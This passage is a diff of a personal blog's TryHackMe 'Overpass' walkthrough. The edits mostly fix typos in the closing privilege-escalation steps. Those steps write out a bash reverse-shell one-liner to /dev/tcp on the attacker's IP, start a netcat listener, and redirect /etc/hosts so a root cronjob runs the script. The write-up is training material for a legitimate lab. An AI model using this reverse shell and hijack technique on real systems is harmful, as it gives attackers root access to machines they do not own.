jaiguptanick/Blog/_posts/2020-07-24-Overpass_TryHackMe.md

 	3. Finally a file named buildscript.sh with the reverse shell , i used it from pentestermonkey.net "bash -i >& /dev/tcp/10.9.19.190/1234 0>&1"
 	4.Now start a netcat listener locally to which the Box will connect.
 	5. At last replace the IP of the /etc/hosts of overpass.thm to our own connecting IP.
-	6. All done now wait a few seconds till it connects back to us via nc listner due to cronjob assigned.
+	6. All done now wait a few seconds till it connects back to us via nc listener due to cronjob assigned.

 ```

 ![Overpass]({{ site.baseurl }}https://jaiguptanick.github.io/Blog/images/overpass/flag2.png)

-Finally we got a connection from the Box as ROOT
+Finally, We got a connection from the Box as ROOT.
+It was really a nice room containing many fundamentals,an I enjoyed soving it and writing its walkthrough.